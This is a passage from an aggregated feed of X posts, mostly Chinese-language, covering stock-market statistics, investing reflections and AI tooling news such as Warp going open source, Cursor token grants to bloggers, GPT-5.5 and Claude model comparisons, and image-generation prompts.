https://www.youtube.com/watch?v=p5e0ThPjIAg&t=646s\n[原文链接](https://x.com/charliebilello/status/2048872600416243932)\n\n**[2026-04-27T16:21:01+00:00]**\n> RT by @charliebilello: Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.\n[原文链接](https://x.com/charliebilello/status/2048799590044852390)\n\n**[2026-04-27T13:50:42+00:00]**\n> RT by @charliebilello: 2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending…\n[原文链接](https://x.com/charliebilello/status/2048761760971096534)\n\n**[2026-04-27T13:16:36+00:00]**\n> RT by @charliebilello: The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX Video: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=…\n[原文链接](https://x.com/charliebilello/status/2048753179471323584)\n\n**[2026-04-27T13:08:19+00:00]**\n> RT by @charliebilello: With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX Video: https://www.youtub…\n[原文链接](https://x.com/charliebilello/status/2048751094671585397)\n\n---\n\n### ✅ @WarriorTrading — Warrior Trading(0 条)\n\n---\n\n### ✅ @CryptoCred — Credible Crypto(1 条)\n\n**[2026-04-22T22:25:51+00:00]**\n> Dev is posting about price\n[原文链接](https://x.com/CryptoCred/status/2047079463750377958)\n\n---\n\n### ✅ @AltcoinBuzz — AltcoinBuzz(0 条)\n\n---\n\n### ✅ @svwang1 — 王川(硅谷)(6 条)\n\n**[2026-04-29T00:48:58+00:00]**\n> 旧金山湾区的地铁站花了九千万美元在入口处加了高高的门,这样逃票变得非常困难。不仅每年增加了一千万美元收入,而且地铁变得更加干净安全,之前要做的各种清理工作减少了 95%。 和外界交往的过程中,增加各种严格的过滤筛选机制,是保护自己,提高效率的一个重要必备的措施。因为成本的原因而对外不设防,就是准备把自己变成垃圾场。\n[原文链接](https://x.com/svwang1/status/2049289806241550791)\n\n**[2026-04-28T22:20:52+00:00]**\n> 人写的文章像面条,再乱,最终还是可以梳理出头绪。ai 写的文章像一锅粥,最后不知所云。\n[原文链接](https://x.com/svwang1/status/2049252535689757003)\n\n**[2026-04-25T01:59:39+00:00]**\n> 自 2021年创立到 2026年三月初累积收入 (不是利润)五十亿美元出头的 anthropic, 在二级市场的估值已经超过一万亿美元。 2025年经营现金流 459亿美元, 税后利润 669亿美元的 Berkshire, 市值也是一万亿美元。\n[原文链接](https://x.com/svwang1/status/2047858045057909226)\n\n**[2026-04-24T15:45:26+00:00]**\n> 投资巴菲特的 Berkshire Hathaway 不能让你暴富,但可以让已经富的人继续富下去。 投资 AI 公司,也许可以让你暴富,但更大的几率是全部亏光。\n[原文链接](https://x.com/svwang1/status/2047703469063377001)\n\n**[2026-04-24T00:27:47+00:00]**\n> R to @Svwang1: 历史读得少的后果,是视野比较狭隘,看得不够远,对于因果链条比较长的事物无法正确理解,因此选择了错误的解释和预测体系。这进一步导致在关键转折点时作出错误选择,在本可低成本提早布局的时刻过于迟钝。\n[原文链接](https://x.com/svwang1/status/2047472537488302502)\n\n**[2026-04-24T00:19:18+00:00]**\n> 多看历史的一个好处是可以给自己开各种上帝视角,枯燥无聊或者低谷期时可以拥有乐观的想象力,顺风顺水时仍然保持谨慎而不得意忘形。\n[原文链接](https://x.com/svwang1/status/2047470402725921150)\n\n---\n\n### ✅ @bozhou_ai — 泊舟(20 条)\n\n**[2026-04-29T10:33:21+00:00]**\n> Warp 昨晚开源了。 GitHub_Daily 写的时候是 34000 Star,刚去看已经 38k+。 Warp 不只是个终端,定位是 ADE(Agentic Development Environment)。内置自家编码 Agent,也支持接入 Claude Code、Codex、Gemini CLI、Kimi CLI 这些外部 CLI Agent,一个窗口里啥都能跑。 几个观察: 第一,…\n[原文链接](https://x.com/bozhou_ai/status/2049436870963085429)\n\n**[2026-04-29T10:32:33+00:00]**\n> MIT 静悄悄放了 12 本 AI 教材出来,全部免费。同样内容去美国念个学位,学费要 5 万美元。 cyrilXBT 整理的清单,分四类。 【基础】 1. Foundations of Machine Learning(Mohri 等):经典 ML 教材,PAC 学习理论到核方法 https://cs.nyu.edu/~mohri/mlbook/ 2. Mathematics for Mach…\n[原文链接](https://x.com/bozhou_ai/status/2049436668663390575)\n\n**[2026-04-28T08:25:44+00:00]**\n> RT by @bozhou_ai: 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal …\n[原文链接](https://x.com/bozhou_ai/status/2049042369530777747)\n\n**[2026-04-28T07:51:43+00:00]**\n> memos确实是在记忆里面做的很不错的,自己做的Agent也可以接入一下他们的\n[原文链接](https://x.com/bozhou_ai/status/2049033808629129504)\n\n**[2026-04-28T07:04:22+00:00]**\n> x.com/i/article/204902020458…\n[原文链接](https://x.com/bozhou_ai/status/2049021892208521544)\n\n**[2026-04-28T00:26:49+00:00]**\n> 我也是强烈推荐5.5,现在我写文章,写代码都是用5.5,比4.7好用很多\n[原文链接](https://x.com/bozhou_ai/status/2048921844175212590)\n\n**[2026-04-27T07:19:46+00:00]**\n> 我以前也会AI焦虑,我现在做的事情,AI以后一定都能做,甚至比我好 现在我觉得,想那么多干嘛,我先用起来,玩起来,Token烧起来,做到是身边圈子里面AI用的做好的一批人就好了\n[原文链接](https://x.com/bozhou_ai/status/2048663377598452202)\n\n**[2026-04-27T05:49:10+00:00]**\n> RT by @bozhou_ai: 中文AI必关注12位高价值博主 AI内容每天都在刷屏,但真正能帮你提效、避坑、落地的其实没几个。 我挑了12位持续输出干货、实战经验丰富的中文博主,覆盖工具测评、Agent搭建、出海变现、Prompt工程、创意落地等方向,建议直接关注。 1. 摸鱼巨匠 @SunNeverSetsX AI+Web3趋势观察者,擅长把前沿资讯浓缩成可落地的认知框架,宏观视野极强 …\n[原文链接](https://x.com/bozhou_ai/status/2048640580004335669)\n\n**[2026-04-27T03:22:54+00:00]**\n> 之前花了不少时间折腾 OpenClaw,想让 AI 在手机上也能帮我干活。结果发现 Token 消耗特别大,效果也没想象中好。后来一直是用 Claude Code写好 Skills 然后给到它来执行。 一直缺的就是一个远程控制的入口。今天发现了 cc-connect 这个开源项目,刚好补上这块。 它做的事很简单:把 AI 编码助手桥接到聊天软件里。支持的面很广: AI 端:Claude Code…\n[原文链接](https://x.com/bozhou_ai/status/2048603768250585231)\n\n**[2026-04-27T01:15:43+00:00]**\n> 人生第一次录播客,我们和cell老师一起聊聊中转站的那些事\n[原文链接](https://x.com/bozhou_ai/status/2048571760698949641)\n\n**[2026-04-26T13:15:51+00:00]**\n> RT by @bozhou_ai: 《Cursor官方资助的 AI & Web3博主》 @cursor_ai 是顶级的AI项目方,最近对15位中文区的博主进行了资助,价值一万美元的Token,如果你是内行了解行情,就知道这个含金量还是很高的。 1. 杀破狼 @wolfyxbt 专注炒Memecoin、Vibe Coding与数据分析,风格幽默直率。 2. 0xAA @0xAA_Science 北…\n[原文链接](https://x.com/bozhou_ai/status/2048390603030032670)\n\n**[2026-04-26T13:00:17+00:00]**\n> GPT 5.5已经开始说人话了,opus4.7完全用不了,还贵\n[原文链接](https://x.com/bozhou_ai/status/2048386685399142532)\n\n**[2026-04-25T09:18:55+00:00]**\n> RT by @bozhou_ai: 卧槽!Cursor 开始支持中文区 AI 博主了! 这几天 Cursor 的团队成员 @edwinarbus 陆续私信了几位影响力较大的 Ai 博主,资助 1w 美金的免费额度, 算是头部 AI 产品首次对中文区做投放。但额度有时间限制,必须在 5 月 31 之前消耗掉。 现在中文区只有极少部分的 KOL 拿到这个额度,所以含金量极高,统计到的只有 15 位博…\n[原文链接](https://x.com/bozhou_ai/status/2047968587902820543)\n\n**[2026-04-25T04:13:59+00:00]**\n> RT by @bozhou_ai: Cursor官方认证博主✅ 你值得关注 11位晒Cursor $10,000额度博主,按X发帖时间大致排序 1️⃣ 铁锤人 (@lxfater) 简介:在用 AI 协助创业,GitHub 维护 3w star 项目,写过 1200w 浏览文章,公众号:铁锤人 推文链接:https://x.com/lxfater/status/20477384398237330…\n[原文链接](https://x.com/bozhou_ai/status/2047891848908472433)\n\n**[2026-04-25T01:17:42+00:00]**\n> Cursor大善人,我也已经领到了,在X上获得的最大一笔收入\n[原文链接](https://x.com/bozhou_ai/status/2047847486430286317)\n\n**[2026-04-24T20:37:10+00:00]**\n> RT by @bozhou_ai: 这是一个关于两个程序员开的Claude Code中转站的呕心沥血的故事,一张聊天记录诠释web2从业者开发的中转站有多负责 今晚要进行数据库迁移,负载均衡配置,与sub2的版本对齐,还有很多为了用户体验上新的功能模块。 于是我和泊舟 @bozhou_ai 商议凌晨2点到4点进行停机更新。 泊舟明天周日要上班,陪我熬到了三点半。我今天早上要给猫打疫苗,约了早上8…\n[原文链接](https://x.com/bozhou_ai/status/2047776887116874076)\n\n**[2026-04-24T13:25:10+00:00]**\n> 今晚由于本次版本升级较大,4月25日凌晨2-4点,将进行停机更新,期间将不可用 更新内容: 1. GPT-image2 上线 3分钱一张 2. 订单查询 3. 发票信息管理和开票 4. 设置余额预警 5. 投诉与意见反馈 6. bug修复还有性能优化\n[原文链接](https://x.com/bozhou_ai/status/2047668172204188156)\n\n**[2026-04-24T11:32:51+00:00]**\n> RT by @bozhou_ai: 给大家科普一下现在GPT-Image-2的低价渠道 第一种就是ChatGPT直充,Free号不能使用,只有 Plus 和 Pro 能够使用。这里我直接推荐两个渠道: 1. 各自小店 http://caowo.store 这个店是我看到的比较便宜的,注意,这个渠道的号没有质保,随时会掉,比较便宜但是不稳定 2. Gamsgo https://www.gamsgo…\n[原文链接](https://x.com/bozhou_ai/status/2047639906030383159)\n\n**[2026-04-24T03:15:38+00:00]**\n> claude 接入 Deepseek教程 第一步: https://platform.deepseek.com/api_keys 创建apikey 第二步: 在cc Switch里面创建供应商,请求地址为 https://api.deepseek.com/anthropic APIKEY 填写刚刚创建的 第三步更改一下模型 点击高级选项,然后主模型 deepseek-v4-pro haiku为 …\n[原文链接](https://x.com/bozhou_ai/status/2047514776612556933)\n\n**[2026-04-24T03:01:58+00:00]**\n> 价格屠夫,参数是真能打\n[原文链接](https://x.com/bozhou_ai/status/2047511335995596887)\n\n---\n\n### ✅ @lxfater — 铁锤人(20 条)\n\n**[2026-04-29T06:02:06+00:00]**\n> 用 GPT Image 2 赚钱,你想到几种方式? 我整理了5种,每种都有提示词,拿走能用 但还有一种方式不用自己会出图也能赚!! 有人进货四分钱,卖两毛,自己一张图都不出 闲鱼上已经有人在跑了 其余 5 种看图 完整提示词加自动化流程,请看引用文章👇\n[原文链接](https://x.com/lxfater/status/2049368609193926810)\n\n**[2026-04-29T03:28:30+00:00]**\n> R to @lxfater: 海报图片提示词 : 请生成一张随机的瑜伽宣传海报拼贴总图。 整体要求: 在一张大画面中,随机分隔出 N 张彼此独立的瑜伽宣传海报 每张卡面尺寸随机设计铺满整张图 卡面之间用清晰的留白、细边框、拼贴切割线或杂志式分隔结构隔开 整体像一次抽出了 N 张不同风格的高质量瑜伽宣传海报 每张海报都要明显不同,具有\"随机抽卡\"的新鲜感和丰富变化 所有海报统一保持高级、专业、吸引…\n[原文链接](https://x.com/lxfater/status/2049329956153352499)\n\n**[2026-04-29T03:28:29+00:00]**\n> R to @lxfater: 如何使用Agent 模式 3 步: 选图像模式 选GPT-2-image 点 Agent 按钮 利用下面给的提示词,出了分镜图和人设图 接下来,利用分镜图和人设图,我们就可以控制人物动作啦!! 如何做到呢?主要思路就是让摆出开始的瑜伽动作和结束的瑜伽动作(具体如图一所示) 得出首帧和尾帧,直接喂给可灵视频模型,就出上面的视频了 多个视频就可以出系列的瑜伽动作 flo…\n[原文链接](https://x.com/lxfater/status/2049329950495310198)\n\n**[2026-04-29T03:28:28+00:00]**\n> 做内容运营,生图生视频,你现在还在跑好几个工具吗? 被朋友拉去做瑜伽图,搭了无数工作流 GPT Image 2 出来后,发现全废了 得重新规划一套,但这几天身体不舒服,没心思搞 随手把提示词扔进 flowith 试了一下 以为偷懒的结果会很烂,但实际上这个是我最近用的最好的生图agent之一。 它直接出了 12 个瑜伽动作分镜,动作清晰,描述完整 分镜图和人物图来生成出首末两张图片,用视频模式可…\n[原文链接](https://x.com/lxfater/status/2049329944052859141)\n\n**[2026-04-29T00:05:46+00:00]**\n> 看来草莓问题和洗车问题很经典了,ChatGPT都在测试\n[原文链接](https://x.com/lxfater/status/2049278935897186512)\n\n**[2026-04-28T13:31:04+00:00]**\n> Flowith出 GPT image 的生图Agent,真快呀 我赶紧试试,看看如何!!\n[原文链接](https://x.com/lxfater/status/2049119209502670864)\n\n**[2026-04-28T07:24:37+00:00]**\n> 说得太对了👍,牛逼\n[原文链接](https://x.com/lxfater/status/2049026986442707117)\n\n**[2026-04-28T06:55:56+00:00]**\n> x.com/i/article/204837140806…\n[原文链接](https://x.com/lxfater/status/2049019768456241273)\n\n**[2026-04-28T06:15:15+00:00]**\n> R to @lxfater: 来源: [1]https://www.businesstoday.in/technology/story/sam-altmans-outside-bets-raise-fresh-conflict-questions-as-openai-nears-ipo-526161-2026-04-17 [2] https://thenextweb.com/news/opena…\n[原文链接](https://x.com/lxfater/status/2049009528595685705)\n\n**[2026-04-28T06:14:44+00:00]**\n> Sam Altman 最聪明的地方,不是把 AI 做起来,是这套给自己捞钱的手法 2015 年,OpenAI 打着非营利的旗号成立 顶级研究员冲着使命感来,不要钱只要理想 Musk 看到了,砸了 3800 万进去 监管也没把它当商业公司盯 连 Musk 这种人都信了 但 CEO 在想另一件事 Altman 从 2014 年开始,在核聚变公司 Helion 买了股 2021 年一口气砸进去 3.7…\n[原文链接](https://x.com/lxfater/status/2049009402372313341)\n\n**[2026-04-28T05:41:43+00:00]**\n> GPT-5.5 在 Code Arena 排第 9 难道是 OpenAI 编程这块掉队了? 但 Arena 自己的统计负责人,几小时后发了条澄清 这榜单,当前只测前端或者说Web DEV GPT-5.5全栈和 GitHub 集成,还要几个月才上,所以现在这方面很弱。 所以不是它编码不行,是它前端这块比 Claude 弱 Code Arena,Code范围仅仅前端也太不合理了吧\n[原文链接](https://x.com/lxfater/status/2049001091916783635)\n\n**[2026-04-28T03:43:41+00:00]**\n> Opus 4.7 的任务遵从性好点,但是其他方面都不如GPT-5.5了 可以用性方面,GPT-5.5很容易低价购得,不被封号\n[原文链接](https://x.com/lxfater/status/2048971387872620715)\n\n**[2026-04-27T11:32:28+00:00]**\n> 栋哥换账号了,帮忙转发一下\n[原文链接](https://x.com/lxfater/status/2048726973682475250)\n\n**[2026-04-26T06:46:13+00:00]**\n> 中国群友的幻想集合: 1. 自动化做自媒体 2. 自动炒股票赚钱 这些都是普通人都能参与的玩意\n[原文链接](https://x.com/lxfater/status/2048292547966210069)\n\n**[2026-04-26T04:53:59+00:00]**\n> 有什么 skill 能把一个设计系统拆解就好了,有吗?\n[原文链接](https://x.com/lxfater/status/2048264304261312720)\n\n**[2026-04-25T09:32:02+00:00]**\n> 铁锤人看了一下额度有1w美金,瞬间眩晕瘫坐,如同第一次看到原子弹爆炸!\n[原文链接](https://x.com/lxfater/status/2047971888409051368)\n\n**[2026-04-25T06:48:24+00:00]**\n> 现在全中推的人都在求Cursor的额度了😂\n[原文链接](https://x.com/lxfater/status/2047930707784487236)\n\n**[2026-04-25T04:16:28+00:00]**\n> 嘿嘿,半夜睡不着占了点优势\n[原文链接](https://x.com/lxfater/status/2047892472177844641)\n\n**[2026-04-24T18:06:34+00:00]**\n> R to @cursor_ai: 兄弟们1w美金 TOKEN呀 https://x.com/lxfater/status/2047738439823733097?s=20\n[原文链接](https://x.com/lxfater/status/2047738989571154030)\n\n**[2026-04-24T08:34:47+00:00]**\n> Cursor的员工私信我要给我送TOKEN了 难道看到我在AI编程工具的声量了 听说cursor 2b做得不错😌,赶紧试用试用 @cursor_ai 你们在中国市场机会很大,原因我就不明说了。\n[原文链接](https://x.com/lxfater/status/2047595092048003140)\n\n---\n\n### ✅ @berryxia — Berryxia(20 条)\n\n**[2026-04-29T06:32:45+00:00]**\n> 看别人天天发商单,还特么疯狂涨粉。 难受了☹️ 是时候,我也要让甲方爸爸来几个单了! 助我一臂之力了嘿嘿😁 在线等啊…\n[原文链接](https://x.com/berryxia/status/2049376324444410138)\n\n**[2026-04-28T23:51:17+00:00]**\n> Google Gemma 官方教你本地跑 Coding Agent! 本地完美组合来了: • Pi Agent • Gemma 4 26B 模型 • LM Studio / Ollama / llama.cpp 等 serving engine 完全离线运行、零 API 费用、100% 隐私保护、零延迟!本地开发者 Agentic 开发神器! 附 @patloeber 详细一步步搭建教程👇 ht…\n[原文链接](https://x.com/berryxia/status/2049275291164692726)\n\n**[2026-04-28T23:46:25+00:00]**\n> 🚀 OpenBMB 重磅发布!MiniCPM-o 4.5 技术报告来了! 9B 参数多模态模型实现突破性实时交互: • Omni-Flow 框架:原生全双工流式交互(视频+音频+文本毫秒级同步) • Native Full-Duplex + Proactive Interaction(无需VAD,可主动提醒) • 多模态基准接近 Gemini 2.5 Flash(MMBench 87.6 / M…\n[原文链接](https://x.com/berryxia/status/2049274065610027362)\n\n**[2026-04-28T22:51:25+00:00]**\n> R to @berryxia: GitHub:https://github.com/harflabs/SwiftVLC ```\n[原文链接](https://x.com/berryxia/status/2049260222863266206)\n\n**[2026-04-28T22:51:22+00:00]**\n> 这个老哥 写的SwiftVLC 正式开源啦!🔥 现代 Swift 6 对 libVLC 的高质量 wrapper(驱动 Tilfaz 应用): • 直接 C bindings,无 Objective-C 桥接 • 严格并发支持(Strict Concurrency) • 专为 SwiftUI 量身打造 • 支持 iOS、macOS、tvOS、Mac Catalyst 附带完整 Showcase …\n[原文链接](https://x.com/berryxia/status/2049260211895185445)\n\n**[2026-04-28T22:48:37+00:00]**\n> GPT2 真的成精了!的确! 小小东老哥整的这套提示词很不错,推荐大家!\n[原文链接](https://x.com/berryxia/status/2049259518027276559)\n\n**[2026-04-28T22:31:31+00:00]**\n> 3D 网格生成重磅突破!SATO 来了! • 从点云(Point Clouds)直接生成完整网格 • Strip-based tokenization,实现超干净边缘流与结构 • 原生 UV segmentation 直接 baked into 生成过程 • 单个模型同时支持三角网格 + 四边形网格\n[原文链接](https://x.com/berryxia/status/2049255217603178794)\n\n**[2026-04-28T22:26:54+00:00]**\n> 我靠!兄弟们?Warp 都要开源了! 官方宣布Warp 正式全面开源啦!🔥 知名现代终端 + Agentic 开发环境 Warp 现在完全开源! • 代码、Roadmap、贡献流程全部开放 • GitHub:https://github.com/warpdotdev/warp • Oz AI agents(GPT 驱动)负责 coding、planning、testing • OpenAI De…\n[原文链接](https://x.com/berryxia/status/2049254052840812960)\n\n**[2026-04-28T22:22:48+00:00]**\n> NVIDIA 重磅发布!🚀 Nemotron 3 Nano Omni 多模态开源模型来了! 🔥 30B 参数 🔥 256K 超长上下文 🔥 最高效开放多模态模型(语言+视觉+语音+视频+音频一体化) 🔥 专为 subagents / Agentic 任务设计 🔥 完全开源(权重 + 数据 + 配方),领跑多项榜单 可通过 NVIDIA NIM API 免费试用!完美 powering 多代理工作…\n[原文链接](https://x.com/berryxia/status/2049253021159403786)\n\n**[2026-04-28T22:20:51+00:00]**\n> Apple Vision Pro “首次”用于真实手术!👀 世界首例白内障手术诞生! 这里我补充一下其实AVP在几年前刚出来那会就已经有国内沈阳那边的医院用于做手术,国内北大好像也有并非首例! 纽约 SightMD 眼科医生 Dr. Eric Rosenberg 使用 Apple Vision Pro + ScopeXR 混合现实平台,于2025年10月完成全球首例,至今已成功实施数百例。 支持…\n[原文链接](https://x.com/berryxia/status/2049252532015579248)\n\n**[2026-04-28T22:13:55+00:00]**\n> R to @berryxia: huggingface.co/poolside/Lagu…\n[原文链接](https://x.com/berryxia/status/2049250788422353142)\n\n**[2026-04-28T22:13:37+00:00]**\n> 前Github CTO team带着新模型来了! 他们的Poolside AI 团队刚刚开源了他们的首个权重模型! 模型名称 Laguna XS.2 • 33B total / 3B active MoE • Apache 2.0 完全开源 • 专为 Agentic Coding + 长时序任务设计 • 单张 GPU 即可流畅运行 同时发布 Laguna M.1(当前最强版)和 Agent Ha…\n[原文链接](https://x.com/berryxia/status/2049250710492160228)\n\n**[2026-04-28T22:10:16+00:00]**\n> 🚀 视频模型其实早就懂3D了! 微软World-R1用RL直接唤醒,无需改架构、无视频训练数据、无额外推理成本! 1. 把相机轨迹嵌入扩散噪声,零额外模块 2. 用Depth Anything 3 + Qwen3-VL做3D几何评判器 3. 周期性解耦训练,建筑保持刚性、旗帜依然飘动 4. 仅用3K条文本提示完成训练,效果惊人 视频生成迈向真实世界模拟的关键一步! 项目地址: https://g…\n[原文链接](https://x.com/berryxia/status/2049249868376604931)\n\n**[2026-04-28T22:02:28+00:00]**\n> Claude 重磅连接创意专业工具! 全新 Blender 和 Autodesk Fusion 连接器上线,通过对话直接调试场景、构建工具、修改3D模型,创意工作流直接搞起来! 1. Blender 连接器:调试场景、批量应用变化、构建新工具,全在 Claude 中完成 2. Autodesk Fusion 连接器:通过自然对话创建和修改3D模型,设计师和工程师效率拉满 3.同日上线更多连接器:…\n[原文链接](https://x.com/berryxia/status/2049247904536428805)\n\n**[2026-04-28T10:31:01+00:00]**\n> R to @berryxia: Hugging Face: https://huggingface.co/collections/sensenova/sensenova-u1 在线体验与接入: SenseNova官网:https://sensenova.sensetime.com/\n[原文链接](https://x.com/berryxia/status/2049073897660953075)\n\n**[2026-04-28T10:31:00+00:00]**\n> 🔥兄弟们,最近多模态图像模型真是神仙打架啊! 看来又要来一波,实测对比了啊! 前几天才发完测试,又有新的模型,真心吃不消啊! 又发现一个全网开源、即刻可用的重磅神器 —— 商汤 OpenSenseNova 刚刚发布 SenseNova-U1! 原生统一多模态大模型,NEO-Unify架构,视觉+语言从第一性原理彻底打通,无独立VE/VAE! 核心技术亮点: • 文本与图像深度交错生成(教程、海报…\n[原文链接](https://x.com/berryxia/status/2049073892829036759)\n\n**[2026-04-28T01:23:38+00:00]**\n> 最让中文出圈的一次竟然就是AI这一波! YC 创始人都开始「出淤泥而不染」了。 那么问题来了?谁是不染?\n[原文链接](https://x.com/berryxia/status/2048936142226309297)\n\n**[2026-04-28T01:21:56+00:00]**\n> 好消息,Outlook 终于特么支持Agent了。 坏消息,国内是否也支持?\n[原文链接](https://x.com/berryxia/status/2048935713950064964)\n\n**[2026-04-27T23:47:24+00:00]**\n> 🚀 Claude Code 终于可以和浏览器并排实时控制了! YC 大佬推出 GStack Browser + /open-gstack-browser skill,调试体验直接起飞! 1. 在 Claude Code 中输入 Install GStack 快速安装 2. 输入 /open-gstack-browser 即可打开浏览器窗口 3. 实现 Claude Code 和浏览器完全 sid…\n[原文链接](https://x.com/berryxia/status/2048911923983593818)\n\n**[2026-04-27T23:35:02+00:00]**\n> R to @berryxia: 地址 https://developers.cloudflare.com/ai/models/minimax/music-2.6/\n[原文链接](https://x.com/berryxia/status/2048908812955070684)\n\n---\n\n### ✅ @Pluvio9yte — 雪踏乌云(17 条)\n\n**[2026-04-29T08:20:26+00:00]**\n> 兄弟们,搞3D的直接冲🤩🤩🤩 Claude上线了Blender MCP连接器, 自然语言直接操控Blender的Python API, 调场景、批量改物体、写自定义工具,不用会一行代码, 我之前在Blender写个批量脚本至少折腾半小时, 现在一句话就搞定了, 更狠的是Anthropic同时砸钱加入了Blender基金会当赞助商, 这波是总共9个创意工具连接器一起上线\n[原文链接](https://x.com/Pluvio9yte/status/2049403423813140571)\n\n**[2026-04-29T04:39:21+00:00]**\n> 未来属于设计 测评 和 运营\n[原文链接](https://x.com/Pluvio9yte/status/2049347785456316549)\n\n**[2026-04-29T01:17:10+00:00]**\n> 搭配收集免费模型的开源项目 使用这篇文章更佳 https://github.com/cheahjs/free-llm-api-resources\n[原文链接](https://x.com/Pluvio9yte/status/2049296905382035945)\n\n**[2026-04-29T01:02:14+00:00]**\n> x.com/i/article/204914647001…\n[原文链接](https://x.com/Pluvio9yte/status/2049293145670836459)\n\n**[2026-04-28T18:42:36+00:00]**\n> 这份提示词感觉用处很多,除了自己写文章当封面,哪天公司要做海报之类的用来小装一手也很有用的🤓 话不多说,看图。提示词见引用文章。\n[原文链接](https://x.com/Pluvio9yte/status/2049197606619017697)\n\n**[2026-04-28T14:06:55+00:00]**\n> 你们的ChatGPT都是什么样子? 提示词如下: ChatGPT,你陪我一段时间了,我想看看你的样子。请生成一张类似你自己用iPhone随手自拍的照片:没有明确主题、没有刻意构图,只是很普通、甚至有点失败的快照。照片略带运动模糊,光线不均、轻微曝光过度,角度尴尬,构图混乱,整体呈现出一种\"过于真实的随手一拍感”,就像是从口袋里拿出手机不小心按到的自拍 linuxdo刷到的\n[原文链接](https://x.com/Pluvio9yte/status/2049128229760561602)\n\n**[2026-04-28T08:25:44+00:00]**\n> RT by @Pluvio9yte: 《Cursor 官方扶持的 AI & Web3 创作者名录》 @cursor_ai 作为顶尖的 AI 项目,最近筛选了 15 位中文区优质博主,给予了价值一万美元的 Token 激励。如果深入了解这个圈子的行情,就会知道这份名单的分量确实不低。 以下是这 15 位获得资助的创作者及其核心画像(顺序随机): 1. Jason Zhu @GoSailGlobal…\n[原文链接](https://x.com/Pluvio9yte/status/2049042369530777747)\n\n**[2026-04-28T07:24:33+00:00]**\n> 找合伙人,先看家室 我知道这个标题会得罪一大堆人。 但我还是要说。 因为这个坑我自己踩过,而且踩得很深,深到现在回想起来还会觉得胸口闷一下。 事情是这样的。去年我找合伙人,找到一个我觉得各方面都很合适的人。能力没问题,聊起来也很投机,对方向的判断跟我高度一致。我当时觉得,就是他了。 然后我就开始掏心掏肺。 我是那种一旦认定了合伙人,就会把底牌全部摊开的人。资源、人脉、我对未来的规划、我手上的牌,…\n[原文链接](https://x.com/Pluvio9yte/status/2049026972337197330)\n\n**[2026-04-28T07:04:22+00:00]**\n> RT by @Pluvio9yte: x.com/i/article/204902020458…\n[原文链接](https://x.com/Pluvio9yte/status/2049021892208521544)\n\n**[2026-04-28T07:01:58+00:00]**\n> 大模型还有擂台赛的😂😂😂\n[原文链接](https://x.com/Pluvio9yte/status/2049021288069599538)\n\n**[2026-04-28T07:00:50+00:00]**\n> MemOS 是所有记忆系统中我用到的最好的,我前几天发现新添加了记忆可视化插件的内容,然后就安装体验了 原来我们可能好奇到底OpenClaw Hermes此类的Agent到底记住了什么,现在在可视化插件的帮助下,我们终于能够看见了他们记忆的内容。\n[原文链接](https://x.com/Pluvio9yte/status/2049021003540598840)\n\n**[2026-04-28T06:58:25+00:00]**\n> x.com/i/article/204900159355…\n[原文链接](https://x.com/Pluvio9yte/status/2049020395874075090)\n\n**[2026-04-28T06:49:24+00:00]**\n> RT by @Pluvio9yte: 介绍下我自己,我是互联网大厂的在职算法工程师,在X上公开分享我学习AI、构建产品和第二收入曲线的过程。 公众号:柯基的思考笔记 下面是一些我搭建的,可能对你有用的东西: 1. 一个每日AI新闻skill,follow 1000+信息源,结合你的个人需求进行定制摘要 介绍:https://x.com/Keji715/status/204839913395467…\n[原文链接](https://x.com/Pluvio9yte/status/2049018122737213860)\n\n**[2026-04-28T05:35:31+00:00]**\n> RT by @Pluvio9yte: 从去年7月份到现在,一路从 Web 排版工具,到 API 服务,再到公众号创作 CLI。 我自己开发者也是创作者,这个产品会尽力保证每个月迭代1次+。 简单说一下目前公众号创作 CLI 支持哪些模式? AI 模式(免费):生成排版 prompt,由你的 Claude / Codex 继续处理,3 个基础主题,动手能力强的自由定制。 API 模式(专业服务):…\n[原文链接](https://x.com/Pluvio9yte/status/2048999532768190606)\n\n**[2026-04-28T04:19:08+00:00]**\n> http://dragoncode.codes 目前全面支持GPT-5.5和GPT-Image-2 可开发票 其实我觉得最有价值的不是我们的中转站,是我们的售后群。 目前已经从售后群里分列出来了跨境交流群,技术交流群。甚至有中学老师用AI撬动了杠杆得到了群友的一直惊叹。 昨天群里技术大牛交流的agent我都看不懂了,还是中转站的高手多🤡\n[原文链接](https://x.com/Pluvio9yte/status/2048980307605635336)\n\n**[2026-04-27T17:15:31+00:00]**\n> 如果不想为Token付费,最好的方案就是在 http://openrouter.ai 上找一些免费模型或者限时免费模型来用Claude Code 配置方案推荐阅读这篇文章\n[原文链接](https://x.com/Pluvio9yte/status/2048813303368138906)\n\n**[2026-04-27T17:03:55+00:00]**\n> 目前最有性价比的模型 GPT-5.5 最有好的官订方案 Claude $100 + ChatGPT $100 最有性价比的方案 Claude 中转站 + ChatGPT $100 为什么 GPT-5.5 这么强并且语言输出改观之后还应该用Claude? 1. 规划能力,Opus 仍然处于一流水准,GPT能补充方案但是不能进行规划。 这里的规划并不是完完全全的规划,而是人永远无法给全上下文,永远要…\n[原文链接](https://x.com/Pluvio9yte/status/2048810385105686557)\n\n---\n\n### ✅ @liuliu — 刘进(3 条)\n\n**[2026-04-24T04:05:41+00:00]**\n> I've been thinking about local LLMs a lot these days.\n[原文链接](https://x.com/liuliu/status/2047527371486658814)\n\n**[2026-04-23T17:57:10+00:00]**\n> I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.\n[原文链接](https://x.com/liuliu/status/2047374234004115719)\n\n**[2026-04-22T16:16:24+00:00]**\n> Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work! Ask Codex to implement a segmented file downloader: didn’t even get the completion blo…\n[原文链接](https://x.com/liuliu/status/2046986486629986435)\n\n---\n\n### ✅ @CuiMao — CuiMao(19 条)\n\n**[2026-04-29T09:35:28+00:00]**\n> 国内自媒体真的赢麻了,随便说点deepseek V4 